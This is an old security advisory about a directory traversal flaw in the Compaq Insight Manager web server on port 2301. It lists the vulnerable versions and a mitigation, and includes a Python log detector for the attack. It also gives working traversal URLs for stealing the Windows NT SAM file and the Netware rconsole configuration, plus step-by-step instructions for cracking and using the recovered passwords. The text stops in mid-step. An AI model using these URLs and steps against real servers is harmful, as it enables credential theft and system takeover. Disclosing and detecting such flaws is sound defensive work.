Security Issue: Exploiting Compaq Insight Manager to Gain Administrator Access
Time from thought to exploit: 4 hours
Risk Classification: High (gain administrator/rconsole access capability)
Effort to Exploit: Easy
Effort to Mitigate: Medium/Easy
Sphere of vulnerability: Any network-attached device that can access port 2301
Infosec Security Vulnerability Report
No: Infosec.19990526.compaq-im.a
=====================================

Vulnerability Summary
---------------------
Problem:  The web server included in Compaq Insight Manager could expose sensitive information.
Threat:   Anyone who has access to port 2301 on a host where Compaq Insight Manager is installed could get unrestricted access to the server's disk through the "root dot dot" bug.
Platform: Detected on Windows NT and Novell Netware servers running on Compaq hardware.
Solution: Disable the Compaq Insight Manager web server or restrict anonymous access.
Vulnerability Description
-------------------------
When installing Compaq Insight Manager, a web server gets installed. This web
server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
bug gives unrestricted access to the vulnerable server's disk. It can easily be
exploited with one of these URLs:

http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf

(How many dots there should be is install-dependent.)
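As an added example, not part of the Infosec advisory, the following check can be run over access or proxy logs for the port-2301 server to spot the "root dot dot" pattern described above: it flags any request whose path escapes the document root after percent-decoding and dot-segment resolution, while ignoring paths that merely contain dots. The log lines are constructed in Common Log Format for illustration; this page does not give the real Compaq HTTP Server log format.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (Common Log Format); hosts, timestamps
# and sizes are made up for illustration, the paths follow the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/1999:10:01:02 +0200] "GET /index.htm HTTP/1.0" 200 1422
10.0.0.9 - - [26/May/1999:10:01:09 +0200] "GET /../../../winnt/repair/sam._ HTTP/1.0" 200 51200
10.0.0.9 - - [26/May/1999:10:01:15 +0200] "GET /%2e%2e/%2e%2e%5Csystem%5Cldremote.ncf HTTP/1.0" 200 380
10.0.0.7 - - [26/May/1999:10:02:00 +0200] "GET /images/logo..gif HTTP/1.0" 200 900
10.0.0.7 - - [26/May/1999:10:02:30 +0200] "GET /docs/../index.htm HTTP/1.0" 200 2210
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def escapes_root(raw_path):
    """Return True if the request path climbs above the web root.
    Percent-encoding is undone repeatedly (double encoding), backslashes
    count as separators, and dot segments are resolved by tracking depth.
    """
    path = raw_path.split("?", 1)[0]
    for _ in range(3):  # undo up to three layers of percent-encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    depth = 0
    for segment in path.replace("\\", "/").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:  # climbed above the document root
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def find_traversal(log_text):
    """Return (client, raw_path) for every request that escapes the root."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and escapes_root(match.group("path")):
            hits.append((line.split()[0], match.group("path")))
    return hits


if __name__ == "__main__":
    for client, path in find_traversal(SAMPLE_LOG):
        print(f"traversal attempt from {client}: {path}")
```

Any hit against a server still running one of the vulnerable versions listed below is worth treating as a probable read of the files named in the advisory.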
Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq
Insight Manager web server. If you are not using the web server, Infosec
recommends disabling the service.
nmap -p 2301 (Address)/16
Compaq Insight Manager Version          | Status
----------------------------------------|-----------
Compaq HTTP Server 1.2.14               | Vulnerable
Compaq HTTP Server 1.2.15 (pre-release) | Vulnerable
Compaq HTTP Server 1.3.12               | Vulnerable
Compaq HTTP Server 1.4.10               | Vulnerable
Compaq HTTP Server 1.5.3                | OK
Compaq HTTP Server 2.0.8                | OK
Microsoft Windows NT:
  1. Using the correct URL, do a File -> Save Target As in Internet Explorer to save the sam._ file from the server to the local PC.
  2. Uncompress the file by using the expand command:
       expand sam._ sam.server
  3. Using L0phtCrack, load the SAM file and start cracking. Find approximately 25% immediately. Let run overnight to get most/all passwords.
  4. Exploit the passwords found by mounting the server's drive, reading files, crashing the server, installing Trojan Horses/viruses.

Novell Netware:
  1. Using the correct URL, do a File -> Save Target As in Internet Explorer to save the ldremote.ncf file from the server to the local PC.
  2. Find the Remote.NLM password decryption tool at PacketStorm. Run REMOTE.EXE with the encrypted password string as the argument to decrypt the rconsole password immediately.
  3. Exploit the password by...